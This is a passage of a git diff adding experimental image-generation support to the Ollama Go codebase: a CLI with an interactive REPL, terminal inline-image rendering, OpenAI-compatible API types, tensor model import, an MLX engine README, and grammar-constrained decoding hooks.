||||
}
|
||||
|
||||
return resp
|
||||
}
|
||||
|
||||
// HandleGenerateRequest handles Ollama /api/generate requests for image gen models.
|
||||
// This allows routes.go to delegate image generation with minimal code.
|
||||
func HandleGenerateRequest(c *gin.Context, scheduler RunnerScheduler, modelName, prompt string, keepAlive *api.Duration, streamFn func(c *gin.Context, ch chan any)) {
|
||||
opts := api.Options{}
|
||||
|
||||
// Schedule runner
|
||||
runner, err := scheduler.ScheduleImageGenRunner(c, modelName, opts, keepAlive)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// Build completion request
|
||||
completionReq := llm.CompletionRequest{
|
||||
Prompt: prompt,
|
||||
Options: &opts,
|
||||
}
|
||||
|
||||
// Stream responses via channel
|
||||
ch := make(chan any)
|
||||
go func() {
|
||||
defer close(ch)
|
||||
err := runner.Completion(c.Request.Context(), completionReq, func(resp llm.CompletionResponse) {
|
||||
ch <- GenerateResponse{
|
||||
Model: modelName,
|
||||
CreatedAt: time.Now().UTC(),
|
||||
Response: resp.Content,
|
||||
Done: resp.Done,
|
||||
}
|
||||
})
|
||||
if err != nil {
|
||||
// Log error but don't block - channel is already being consumed
|
||||
_ = err
|
||||
}
|
||||
}()
|
||||
|
||||
streamFn(c, ch)
|
||||
}
|
||||
|
||||
// GenerateResponse matches api.GenerateResponse structure for streaming.
|
||||
type GenerateResponse struct {
|
||||
Model string `json:"model"`
|
||||
CreatedAt time.Time `json:"created_at"`
|
||||
Response string `json:"response"`
|
||||
Done bool `json:"done"`
|
||||
}
|
||||
31
x/imagegen/api/types.go
Normal file
31
x/imagegen/api/types.go
Normal file
@@ -0,0 +1,31 @@
|
||||
// Package api provides OpenAI-compatible image generation API types.
|
||||
package api
|
||||
|
||||
// ImageGenerationRequest is an OpenAI-compatible image generation request.
|
||||
type ImageGenerationRequest struct {
|
||||
Model string `json:"model"`
|
||||
Prompt string `json:"prompt"`
|
||||
N int `json:"n,omitempty"`
|
||||
Size string `json:"size,omitempty"`
|
||||
ResponseFormat string `json:"response_format,omitempty"`
|
||||
Stream bool `json:"stream,omitempty"`
|
||||
}
|
||||
|
||||
// ImageGenerationResponse is an OpenAI-compatible image generation response.
|
||||
type ImageGenerationResponse struct {
|
||||
Created int64 `json:"created"`
|
||||
Data []ImageData `json:"data"`
|
||||
}
|
||||
|
||||
// ImageData contains the generated image data.
|
||||
type ImageData struct {
|
||||
URL string `json:"url,omitempty"`
|
||||
B64JSON string `json:"b64_json,omitempty"`
|
||||
RevisedPrompt string `json:"revised_prompt,omitempty"`
|
||||
}
|
||||
|
||||
// ImageProgressEvent is sent during streaming to indicate generation progress.
|
||||
type ImageProgressEvent struct {
|
||||
Step int `json:"step"`
|
||||
Total int `json:"total"`
|
||||
}
|
||||
539
x/imagegen/cli.go
Normal file
539
x/imagegen/cli.go
Normal file
@@ -0,0 +1,539 @@
|
||||
// cli.go provides CLI commands for image generation models.
|
||||
//
|
||||
// TODO (jmorganca): Integrate these commands into cmd/cmd.go when stable.
|
||||
// Currently these are separate to keep experimental code isolated.
|
||||
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/spf13/cobra"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
"github.com/ollama/ollama/envconfig"
|
||||
"github.com/ollama/ollama/progress"
|
||||
"github.com/ollama/ollama/readline"
|
||||
)
|
||||
|
||||
// ImageGenOptions holds options for image generation.
|
||||
// These can be set via environment variables or interactive commands.
|
||||
type ImageGenOptions struct {
|
||||
Width int
|
||||
Height int
|
||||
Steps int
|
||||
Seed int
|
||||
NegativePrompt string
|
||||
}
|
||||
|
||||
// DefaultOptions returns the default image generation options.
|
||||
func DefaultOptions() ImageGenOptions {
|
||||
return ImageGenOptions{
|
||||
Width: 1024,
|
||||
Height: 1024,
|
||||
Steps: 9,
|
||||
Seed: 0, // 0 means random
|
||||
}
|
||||
}
|
||||
|
||||
// Show displays information about an image generation model.
|
||||
func Show(modelName string, w io.Writer) error {
|
||||
manifest, err := LoadManifest(modelName)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to load manifest: %w", err)
|
||||
}
|
||||
|
||||
// Count total size
|
||||
var totalSize int64
|
||||
for _, layer := range manifest.Manifest.Layers {
|
||||
if layer.MediaType == "application/vnd.ollama.image.tensor" {
|
||||
totalSize += layer.Size
|
||||
}
|
||||
}
|
||||
|
||||
// Read model_index.json for architecture
|
||||
var architecture string
|
||||
if data, err := manifest.ReadConfig("model_index.json"); err == nil {
|
||||
var index struct {
|
||||
Architecture string `json:"architecture"`
|
||||
}
|
||||
if json.Unmarshal(data, &index) == nil {
|
||||
architecture = index.Architecture
|
||||
}
|
||||
}
|
||||
|
||||
// Estimate parameter count from total size (assuming BF16 = 2 bytes per param)
|
||||
paramCount := totalSize / 2
|
||||
paramStr := formatParamCount(paramCount)
|
||||
|
||||
// Print Model info
|
||||
fmt.Fprintln(w, " Model")
|
||||
if architecture != "" {
|
||||
fmt.Fprintf(w, " %-20s %s\n", "architecture", architecture)
|
||||
}
|
||||
fmt.Fprintf(w, " %-20s %s\n", "parameters", paramStr)
|
||||
fmt.Fprintf(w, " %-20s %s\n", "quantization", "BF16")
|
||||
fmt.Fprintln(w)
|
||||
|
||||
// Print Capabilities
|
||||
fmt.Fprintln(w, " Capabilities")
|
||||
fmt.Fprintf(w, " %s\n", "image")
|
||||
fmt.Fprintln(w)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// formatParamCount formats parameter count as human-readable string.
|
||||
func formatParamCount(count int64) string {
|
||||
if count >= 1_000_000_000 {
|
||||
return fmt.Sprintf("%.1fB", float64(count)/1_000_000_000)
|
||||
}
|
||||
if count >= 1_000_000 {
|
||||
return fmt.Sprintf("%.1fM", float64(count)/1_000_000)
|
||||
}
|
||||
return fmt.Sprintf("%d", count)
|
||||
}
|
||||
|
||||
// RegisterFlags adds image generation flags to the given command.
|
||||
// Flags are hidden since they only apply to image generation models.
|
||||
func RegisterFlags(cmd *cobra.Command) {
|
||||
cmd.Flags().Int("width", 1024, "Image width")
|
||||
cmd.Flags().Int("height", 1024, "Image height")
|
||||
cmd.Flags().Int("steps", 9, "Denoising steps")
|
||||
cmd.Flags().Int("seed", 0, "Random seed (0 for random)")
|
||||
cmd.Flags().String("negative", "", "Negative prompt")
|
||||
cmd.Flags().MarkHidden("width")
|
||||
cmd.Flags().MarkHidden("height")
|
||||
cmd.Flags().MarkHidden("steps")
|
||||
cmd.Flags().MarkHidden("seed")
|
||||
cmd.Flags().MarkHidden("negative")
|
||||
}
|
||||
|
||||
// RunCLI handles the CLI for image generation models.
|
||||
// Returns true if it handled the request, false if the caller should continue with normal flow.
|
||||
// Supports flags: --width, --height, --steps, --seed, --negative
|
||||
func RunCLI(cmd *cobra.Command, name string, prompt string, interactive bool, keepAlive *api.Duration) error {
|
||||
// Verify it's a valid image gen model
|
||||
if ResolveModelName(name) == "" {
|
||||
return fmt.Errorf("unknown image generation model: %s", name)
|
||||
}
|
||||
|
||||
// Get options from flags (with env var defaults)
|
||||
opts := DefaultOptions()
|
||||
if cmd != nil && cmd.Flags() != nil {
|
||||
if v, err := cmd.Flags().GetInt("width"); err == nil && v > 0 {
|
||||
opts.Width = v
|
||||
}
|
||||
if v, err := cmd.Flags().GetInt("height"); err == nil && v > 0 {
|
||||
opts.Height = v
|
||||
}
|
||||
if v, err := cmd.Flags().GetInt("steps"); err == nil && v > 0 {
|
||||
opts.Steps = v
|
||||
}
|
||||
if v, err := cmd.Flags().GetInt("seed"); err == nil && v != 0 {
|
||||
opts.Seed = v
|
||||
}
|
||||
if v, err := cmd.Flags().GetString("negative"); err == nil && v != "" {
|
||||
opts.NegativePrompt = v
|
||||
}
|
||||
}
|
||||
|
||||
if interactive {
|
||||
return runInteractive(cmd, name, keepAlive, opts)
|
||||
}
|
||||
|
||||
// One-shot generation
|
||||
return generateImageWithOptions(cmd, name, prompt, keepAlive, opts)
|
||||
}
|
||||
|
||||
// generateImageWithOptions generates an image with the given options.
|
||||
func generateImageWithOptions(cmd *cobra.Command, modelName, prompt string, keepAlive *api.Duration, opts ImageGenOptions) error {
|
||||
client, err := api.ClientFromEnvironment()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Build request with image gen options encoded in Options fields
|
||||
// NumCtx=width, NumGPU=height, NumPredict=steps, Seed=seed
|
||||
req := &api.GenerateRequest{
|
||||
Model: modelName,
|
||||
Prompt: prompt,
|
||||
Options: map[string]any{
|
||||
"num_ctx": opts.Width,
|
||||
"num_gpu": opts.Height,
|
||||
"num_predict": opts.Steps,
|
||||
"seed": opts.Seed,
|
||||
},
|
||||
}
|
||||
if keepAlive != nil {
|
||||
req.KeepAlive = keepAlive
|
||||
}
|
||||
|
||||
// Show loading spinner until generation starts
|
||||
p := progress.NewProgress(os.Stderr)
|
||||
spinner := progress.NewSpinner("")
|
||||
p.Add("", spinner)
|
||||
|
||||
var stepBar *progress.StepBar
|
||||
var imagePath string
|
||||
|
||||
err = client.Generate(cmd.Context(), req, func(resp api.GenerateResponse) error {
|
||||
content := resp.Response
|
||||
|
||||
// Handle progress updates - parse step info and switch to step bar
|
||||
if strings.HasPrefix(content, "\rGenerating:") {
|
||||
var step, total int
|
||||
fmt.Sscanf(content, "\rGenerating: step %d/%d", &step, &total)
|
||||
if stepBar == nil && total > 0 {
|
||||
spinner.Stop()
|
||||
stepBar = progress.NewStepBar("Generating", total)
|
||||
p.Add("", stepBar)
|
||||
}
|
||||
if stepBar != nil {
|
||||
stepBar.Set(step)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Handle final response with image path
|
||||
if resp.Done && strings.Contains(content, "Image saved to:") {
|
||||
if idx := strings.Index(content, "Image saved to: "); idx >= 0 {
|
||||
imagePath = strings.TrimSpace(content[idx+16:])
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
})
|
||||
|
||||
p.Stop()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if imagePath != "" {
|
||||
displayImageInTerminal(imagePath)
|
||||
fmt.Printf("Image saved to: %s\n", imagePath)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// runInteractive runs an interactive REPL for image generation.
|
||||
func runInteractive(cmd *cobra.Command, modelName string, keepAlive *api.Duration, opts ImageGenOptions) error {
|
||||
client, err := api.ClientFromEnvironment()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
scanner, err := readline.New(readline.Prompt{
|
||||
Prompt: ">>> ",
|
||||
Placeholder: "Describe an image to generate (/help for commands)",
|
||||
})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if envconfig.NoHistory() {
|
||||
scanner.HistoryDisable()
|
||||
}
|
||||
|
||||
for {
|
||||
line, err := scanner.Readline()
|
||||
switch {
|
||||
case errors.Is(err, io.EOF):
|
||||
fmt.Println()
|
||||
return nil
|
||||
case errors.Is(err, readline.ErrInterrupt):
|
||||
if line == "" {
|
||||
fmt.Println("\nUse Ctrl + d or /bye to exit.")
|
||||
}
|
||||
continue
|
||||
case err != nil:
|
||||
return err
|
||||
}
|
||||
|
||||
line = strings.TrimSpace(line)
|
||||
if line == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
// Handle commands
|
||||
switch {
|
||||
case strings.HasPrefix(line, "/bye"):
|
||||
return nil
|
||||
case strings.HasPrefix(line, "/?"), strings.HasPrefix(line, "/help"):
|
||||
printInteractiveHelp(opts)
|
||||
continue
|
||||
case strings.HasPrefix(line, "/set "):
|
||||
if err := handleSetCommand(line[5:], &opts); err != nil {
|
||||
fmt.Fprintf(os.Stderr, "Error: %v\n", err)
|
||||
}
|
||||
continue
|
||||
case strings.HasPrefix(line, "/show"):
|
||||
printCurrentSettings(opts)
|
||||
continue
|
||||
case strings.HasPrefix(line, "/"):
|
||||
fmt.Fprintf(os.Stderr, "Unknown command: %s (try /help)\n", line)
|
||||
continue
|
||||
}
|
||||
|
||||
// Generate image with current options
|
||||
req := &api.GenerateRequest{
|
||||
Model: modelName,
|
||||
Prompt: line,
|
||||
Options: map[string]any{
|
||||
"num_ctx": opts.Width,
|
||||
"num_gpu": opts.Height,
|
||||
"num_predict": opts.Steps,
|
||||
"seed": opts.Seed,
|
||||
},
|
||||
}
|
||||
if keepAlive != nil {
|
||||
req.KeepAlive = keepAlive
|
||||
}
|
||||
|
||||
// Show loading spinner until generation starts
|
||||
p := progress.NewProgress(os.Stderr)
|
||||
spinner := progress.NewSpinner("")
|
||||
p.Add("", spinner)
|
||||
|
||||
var stepBar *progress.StepBar
|
||||
var imagePath string
|
||||
|
||||
err = client.Generate(cmd.Context(), req, func(resp api.GenerateResponse) error {
|
||||
content := resp.Response
|
||||
|
||||
// Handle progress updates - parse step info and switch to step bar
|
||||
if strings.HasPrefix(content, "\rGenerating:") {
|
||||
var step, total int
|
||||
fmt.Sscanf(content, "\rGenerating: step %d/%d", &step, &total)
|
||||
if stepBar == nil && total > 0 {
|
||||
spinner.Stop()
|
||||
stepBar = progress.NewStepBar("Generating", total)
|
||||
p.Add("", stepBar)
|
||||
}
|
||||
if stepBar != nil {
|
||||
stepBar.Set(step)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Handle final response with image path
|
||||
if resp.Done && strings.Contains(content, "Image saved to:") {
|
||||
if idx := strings.Index(content, "Image saved to: "); idx >= 0 {
|
||||
imagePath = strings.TrimSpace(content[idx+16:])
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
})
|
||||
|
||||
p.Stop()
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "Error: %v\n", err)
|
||||
continue
|
||||
}
|
||||
|
||||
// Copy image to current directory with descriptive name
|
||||
if imagePath != "" {
|
||||
// Create filename from prompt (sanitized)
|
||||
safeName := sanitizeFilename(line)
|
||||
if len(safeName) > 50 {
|
||||
safeName = safeName[:50]
|
||||
}
|
||||
timestamp := time.Now().Format("20060102-150405")
|
||||
newName := fmt.Sprintf("%s-%s.png", safeName, timestamp)
|
||||
|
||||
// Copy file to CWD
|
||||
if err := copyFile(imagePath, newName); err != nil {
|
||||
fmt.Fprintf(os.Stderr, "Error saving to current directory: %v\n", err)
|
||||
displayImageInTerminal(imagePath)
|
||||
fmt.Printf("Image saved to: %s\n", imagePath)
|
||||
} else {
|
||||
displayImageInTerminal(newName)
|
||||
fmt.Printf("Image saved to: %s\n", newName)
|
||||
}
|
||||
}
|
||||
|
||||
fmt.Println()
|
||||
}
|
||||
}
|
||||
|
||||
// sanitizeFilename removes characters that aren't safe for filenames.
|
||||
func sanitizeFilename(s string) string {
|
||||
s = strings.ToLower(s)
|
||||
s = strings.ReplaceAll(s, " ", "-")
|
||||
// Remove any character that's not alphanumeric or hyphen
|
||||
var result strings.Builder
|
||||
for _, r := range s {
|
||||
if (r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') || r == '-' {
|
||||
result.WriteRune(r)
|
||||
}
|
||||
}
|
||||
return result.String()
|
||||
}
|
||||
|
||||
// copyFile copies a file from src to dst.
|
||||
func copyFile(src, dst string) error {
|
||||
sourceFile, err := os.Open(src)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer sourceFile.Close()
|
||||
|
||||
destFile, err := os.Create(dst)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer destFile.Close()
|
||||
|
||||
_, err = io.Copy(destFile, sourceFile)
|
||||
return err
|
||||
}
|
||||
|
||||
// printInteractiveHelp prints help for interactive mode commands.
|
||||
func printInteractiveHelp(opts ImageGenOptions) {
|
||||
fmt.Fprintln(os.Stderr, "Commands:")
|
||||
fmt.Fprintln(os.Stderr, " /set width <n> Set image width (current:", opts.Width, ")")
|
||||
fmt.Fprintln(os.Stderr, " /set height <n> Set image height (current:", opts.Height, ")")
|
||||
fmt.Fprintln(os.Stderr, " /set steps <n> Set denoising steps (current:", opts.Steps, ")")
|
||||
fmt.Fprintln(os.Stderr, " /set seed <n> Set random seed (current:", opts.Seed, ", 0=random)")
|
||||
fmt.Fprintln(os.Stderr, " /set negative <s> Set negative prompt")
|
||||
fmt.Fprintln(os.Stderr, " /show Show current settings")
|
||||
fmt.Fprintln(os.Stderr, " /bye Exit")
|
||||
fmt.Fprintln(os.Stderr)
|
||||
fmt.Fprintln(os.Stderr, "Or type a prompt to generate an image.")
|
||||
fmt.Fprintln(os.Stderr)
|
||||
}
|
||||
|
||||
// printCurrentSettings prints the current image generation settings.
|
||||
func printCurrentSettings(opts ImageGenOptions) {
|
||||
fmt.Fprintf(os.Stderr, "Current settings:\n")
|
||||
fmt.Fprintf(os.Stderr, " width: %d\n", opts.Width)
|
||||
fmt.Fprintf(os.Stderr, " height: %d\n", opts.Height)
|
||||
fmt.Fprintf(os.Stderr, " steps: %d\n", opts.Steps)
|
||||
fmt.Fprintf(os.Stderr, " seed: %d (0=random)\n", opts.Seed)
|
||||
if opts.NegativePrompt != "" {
|
||||
fmt.Fprintf(os.Stderr, " negative: %s\n", opts.NegativePrompt)
|
||||
}
|
||||
fmt.Fprintln(os.Stderr)
|
||||
}
|
||||
|
||||
// handleSetCommand handles /set commands to change options.
|
||||
func handleSetCommand(args string, opts *ImageGenOptions) error {
|
||||
parts := strings.SplitN(args, " ", 2)
|
||||
if len(parts) < 2 {
|
||||
return fmt.Errorf("usage: /set <option> <value>")
|
||||
}
|
||||
|
||||
key := strings.ToLower(parts[0])
|
||||
value := strings.TrimSpace(parts[1])
|
||||
|
||||
switch key {
|
||||
case "width", "w":
|
||||
v, err := strconv.Atoi(value)
|
||||
if err != nil || v <= 0 {
|
||||
return fmt.Errorf("width must be a positive integer")
|
||||
}
|
||||
opts.Width = v
|
||||
fmt.Fprintf(os.Stderr, "Set width to %d\n", v)
|
||||
case "height", "h":
|
||||
v, err := strconv.Atoi(value)
|
||||
if err != nil || v <= 0 {
|
||||
return fmt.Errorf("height must be a positive integer")
|
||||
}
|
||||
opts.Height = v
|
||||
fmt.Fprintf(os.Stderr, "Set height to %d\n", v)
|
||||
case "steps", "s":
|
||||
v, err := strconv.Atoi(value)
|
||||
if err != nil || v <= 0 {
|
||||
return fmt.Errorf("steps must be a positive integer")
|
||||
}
|
||||
opts.Steps = v
|
||||
fmt.Fprintf(os.Stderr, "Set steps to %d\n", v)
|
||||
case "seed":
|
||||
v, err := strconv.Atoi(value)
|
||||
if err != nil {
|
||||
return fmt.Errorf("seed must be an integer")
|
||||
}
|
||||
opts.Seed = v
|
||||
fmt.Fprintf(os.Stderr, "Set seed to %d\n", v)
|
||||
case "negative", "neg", "n":
|
||||
opts.NegativePrompt = value
|
||||
if value == "" {
|
||||
fmt.Fprintln(os.Stderr, "Cleared negative prompt")
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "Set negative prompt to: %s\n", value)
|
||||
}
|
||||
default:
|
||||
return fmt.Errorf("unknown option: %s (try /help)", key)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// displayImageInTerminal attempts to render an image inline in the terminal.
|
||||
// Supports iTerm2, Kitty, WezTerm, Ghostty, and other terminals with inline image support.
|
||||
// Returns true if the image was displayed, false otherwise.
|
||||
func displayImageInTerminal(imagePath string) bool {
|
||||
// Check if terminal supports inline images
|
||||
termProgram := os.Getenv("TERM_PROGRAM")
|
||||
kittyWindowID := os.Getenv("KITTY_WINDOW_ID")
|
||||
weztermPane := os.Getenv("WEZTERM_PANE")
|
||||
ghostty := os.Getenv("GHOSTTY_RESOURCES_DIR")
|
||||
|
||||
// Read the image file
|
||||
data, err := os.ReadFile(imagePath)
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
encoded := base64.StdEncoding.EncodeToString(data)
|
||||
|
||||
switch {
|
||||
case termProgram == "iTerm.app" || termProgram == "WezTerm" || weztermPane != "":
|
||||
// iTerm2/WezTerm inline image protocol
|
||||
// ESC ] 1337 ; File = [arguments] : base64 BEL
|
||||
fmt.Printf("\033]1337;File=inline=1;preserveAspectRatio=1:%s\a\n", encoded)
|
||||
return true
|
||||
|
||||
case kittyWindowID != "" || ghostty != "" || termProgram == "ghostty":
|
||||
// Kitty graphics protocol (also used by Ghostty)
|
||||
// Send in chunks for large images
|
||||
const chunkSize = 4096
|
||||
for i := 0; i < len(encoded); i += chunkSize {
|
||||
end := i + chunkSize
|
||||
if end > len(encoded) {
|
||||
end = len(encoded)
|
||||
}
|
||||
chunk := encoded[i:end]
|
||||
|
||||
if i == 0 {
|
||||
// First chunk: a=T (transmit), f=100 (PNG), m=1 (more chunks follow) or m=0 (last chunk)
|
||||
more := 1
|
||||
if end >= len(encoded) {
|
||||
more = 0
|
||||
}
|
||||
fmt.Printf("\033_Ga=T,f=100,m=%d;%s\033\\", more, chunk)
|
||||
} else if end >= len(encoded) {
|
||||
// Last chunk
|
||||
fmt.Printf("\033_Gm=0;%s\033\\", chunk)
|
||||
} else {
|
||||
// Middle chunk
|
||||
fmt.Printf("\033_Gm=1;%s\033\\", chunk)
|
||||
}
|
||||
}
|
||||
fmt.Println()
|
||||
return true
|
||||
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
130
x/imagegen/client/create.go
Normal file
130
x/imagegen/client/create.go
Normal file
@@ -0,0 +1,130 @@
|
||||
// Package client provides client-side model creation for tensor-based models.
|
||||
//
|
||||
// This package is in x/ because the tensor model storage format is under development.
|
||||
// It also exists to break an import cycle: server imports x/imagegen, so x/imagegen
|
||||
// cannot import server. This sub-package can import server because server doesn't
|
||||
// import it.
|
||||
//
|
||||
// TODO (jmorganca): This is temporary. When tensor models are promoted to production:
|
||||
// 1. Add proper API endpoints for tensor model creation
|
||||
// 2. Move tensor extraction to server-side
|
||||
// 3. Remove this package
|
||||
// 4. Follow the same client→server pattern as regular model creation
|
||||
package client
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
|
||||
"github.com/ollama/ollama/progress"
|
||||
"github.com/ollama/ollama/server"
|
||||
"github.com/ollama/ollama/types/model"
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
)
|
||||
|
||||
// MinOllamaVersion is the minimum Ollama version required for image generation models.
|
||||
const MinOllamaVersion = "0.14.0"
|
||||
|
||||
// CreateModel imports a tensor-based model from a local directory.
|
||||
// This creates blobs and manifest directly on disk, bypassing the HTTP API.
|
||||
//
|
||||
// TODO (jmorganca): Replace with API-based creation when promoted to production.
|
||||
func CreateModel(modelName, modelDir string, p *progress.Progress) error {
|
||||
if !imagegen.IsTensorModelDir(modelDir) {
|
||||
return fmt.Errorf("%s is not an image generation model directory (model_index.json not found)", modelDir)
|
||||
}
|
||||
|
||||
status := "importing image generation model"
|
||||
spinner := progress.NewSpinner(status)
|
||||
p.Add("imagegen", spinner)
|
||||
|
||||
// Create layer callback for config files
|
||||
createLayer := func(r io.Reader, mediaType, name string) (imagegen.LayerInfo, error) {
|
||||
layer, err := server.NewLayer(r, mediaType)
|
||||
if err != nil {
|
||||
return imagegen.LayerInfo{}, err
|
||||
}
|
||||
layer.Name = name
|
||||
|
||||
return imagegen.LayerInfo{
|
||||
Digest: layer.Digest,
|
||||
Size: layer.Size,
|
||||
MediaType: layer.MediaType,
|
||||
Name: name,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Create tensor layer callback for individual tensors
|
||||
// name is path-style: "component/tensor_name"
|
||||
createTensorLayer := func(r io.Reader, name, dtype string, shape []int32) (imagegen.LayerInfo, error) {
|
||||
layer, err := server.NewLayer(r, server.MediaTypeImageTensor)
|
||||
if err != nil {
|
||||
return imagegen.LayerInfo{}, err
|
||||
}
|
||||
layer.Name = name
|
||||
|
||||
return imagegen.LayerInfo{
|
||||
Digest: layer.Digest,
|
||||
Size: layer.Size,
|
||||
MediaType: layer.MediaType,
|
||||
Name: name,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Create manifest writer callback
|
||||
writeManifest := func(modelName string, config imagegen.LayerInfo, layers []imagegen.LayerInfo) error {
|
||||
name := model.ParseName(modelName)
|
||||
if !name.IsValid() {
|
||||
return fmt.Errorf("invalid model name: %s", modelName)
|
||||
}
|
||||
|
||||
// Create a proper config blob with version requirement
|
||||
configData := model.ConfigV2{
|
||||
ModelFormat: "safetensors",
|
||||
Capabilities: []string{"image"},
|
||||
Requires: MinOllamaVersion,
|
||||
}
|
||||
configJSON, err := json.Marshal(configData)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal config: %w", err)
|
||||
}
|
||||
|
||||
// Create config layer blob
|
||||
configLayer, err := server.NewLayer(bytes.NewReader(configJSON), "application/vnd.docker.container.image.v1+json")
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to create config layer: %w", err)
|
||||
}
|
||||
|
||||
// Convert LayerInfo to server.Layer (include the original model_index.json in layers)
|
||||
serverLayers := make([]server.Layer, len(layers))
|
||||
for i, l := range layers {
|
||||
serverLayers[i] = server.Layer{
|
||||
MediaType: l.MediaType,
|
||||
Digest: l.Digest,
|
||||
Size: l.Size,
|
||||
Name: l.Name,
|
||||
}
|
||||
}
|
||||
|
||||
return server.WriteManifest(name, configLayer, serverLayers)
|
||||
}
|
||||
|
||||
// Progress callback
|
||||
progressFn := func(msg string) {
|
||||
spinner.Stop()
|
||||
status = msg
|
||||
spinner = progress.NewSpinner(status)
|
||||
p.Add("imagegen", spinner)
|
||||
}
|
||||
|
||||
err := imagegen.CreateModel(modelName, modelDir, createLayer, createTensorLayer, writeManifest, progressFn)
|
||||
spinner.Stop()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
fmt.Printf("Created image generation model '%s'\n", modelName)
|
||||
return nil
|
||||
}
|
||||
35
x/imagegen/cmd/engine/README.md
Normal file
35
x/imagegen/cmd/engine/README.md
Normal file
@@ -0,0 +1,35 @@
|
||||
# MLX Engine
|
||||
|
||||
Experimental MLX backend for running models on Apple Silicon and CUDA.
|
||||
|
||||
## Build
|
||||
|
||||
```bash
|
||||
go build -tags mlx -o engine ./x/imagegen/cmd/engine
|
||||
```
|
||||
|
||||
## Text Generation
|
||||
|
||||
```bash
|
||||
./engine -model /path/to/model -prompt "Hello" -max-tokens 100
|
||||
```
|
||||
|
||||
Options:
|
||||
|
||||
- `-temperature` - sampling temperature (default 0.7)
|
||||
- `-top-p` - nucleus sampling (default 0.9)
|
||||
- `-top-k` - top-k sampling (default 40)
|
||||
|
||||
Supports: Llama, Gemma3, GPT-OSS
|
||||
|
||||
## Image Generation
|
||||
|
||||
```bash
|
||||
./engine -zimage -model /path/to/z-image -prompt "a cat" -output cat.png
|
||||
```
|
||||
|
||||
Options:
|
||||
|
||||
- `-width`, `-height` - image dimensions (default 1024x1024)
|
||||
- `-steps` - denoising steps (default 9)
|
||||
- `-seed` - random seed (default 42)
|
||||
@@ -8,6 +8,7 @@ import (
|
||||
"time"
|
||||
"unicode/utf8"
|
||||
|
||||
"github.com/ollama/ollama/x/grammar"
|
||||
"github.com/ollama/ollama/x/imagegen/cache"
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
"github.com/ollama/ollama/x/imagegen/tokenizer"
|
||||
@@ -109,7 +110,11 @@ type input struct {
|
||||
Temperature float32
|
||||
TopP float32
|
||||
TopK int
|
||||
WiredLimitGB int // Metal wired memory limit in GB (default 32)
|
||||
WiredLimitGB int // Metal wired memory limit in GB (default 32)
|
||||
JSONMode bool // Enable JSON grammar constraint
|
||||
GrammarEBNF string // Raw EBNF grammar string
|
||||
GrammarStart string // Start rule name for grammar
|
||||
Vocab []string // Vocabulary for constrained decoding
|
||||
}
|
||||
|
||||
type output struct {
|
||||
@@ -127,9 +132,11 @@ type Decoder struct {
|
||||
temp float32
|
||||
topK int
|
||||
topP float32
|
||||
token *mlx.Array // Current token (kept across pools)
|
||||
oldCacheState []*mlx.Array // Preallocated slice for old cache state
|
||||
image *mlx.Array // Optional image for multimodal prefill
|
||||
token *mlx.Array // Current token (kept across pools)
|
||||
oldCacheState []*mlx.Array // Preallocated slice for old cache state
|
||||
image *mlx.Array // Optional image for multimodal prefill
|
||||
grammar *grammar.Engine // Optional grammar constraint engine
|
||||
grammarVocab []string // Vocab for grammar debug
|
||||
}
|
||||
|
||||
func NewDecoder(m Model, temp float32, topK int, topP float32) *Decoder {
|
||||
@@ -145,6 +152,12 @@ func NewDecoder(m Model, temp float32, topK int, topP float32) *Decoder {
|
||||
}
|
||||
}
|
||||
|
||||
// SetGrammar enables constrained decoding with the given grammar engine.
|
||||
func (d *Decoder) SetGrammar(g *grammar.Engine, vocab []string) {
|
||||
d.grammar = g
|
||||
d.grammarVocab = vocab
|
||||
}
|
||||
|
||||
// SetImage sets the image for multimodal prefill (call before prefill)
|
||||
func (d *Decoder) SetImage(img *mlx.Array) {
|
||||
d.image = img
|
||||
@@ -222,6 +235,16 @@ func (d *Decoder) prefill(inputIDs []int32) int {
|
||||
} else {
|
||||
logits = d.model.Forward(x, d.caches)
|
||||
}
|
||||
|
||||
// Apply grammar constraints if enabled
|
||||
if d.grammar != nil {
|
||||
shape := logits.Shape()
|
||||
lastLogits := mlx.Slice(logits, []int32{0, shape[1] - 1, 0}, []int32{1, shape[1], d.vocabSize})
|
||||
lastLogits = mlx.Reshape(lastLogits, d.vocabSize)
|
||||
maskedLogits := d.grammar.ApplyMask(lastLogits)
|
||||
logits = mlx.Reshape(maskedLogits, 1, 1, d.vocabSize)
|
||||
}
|
||||
|
||||
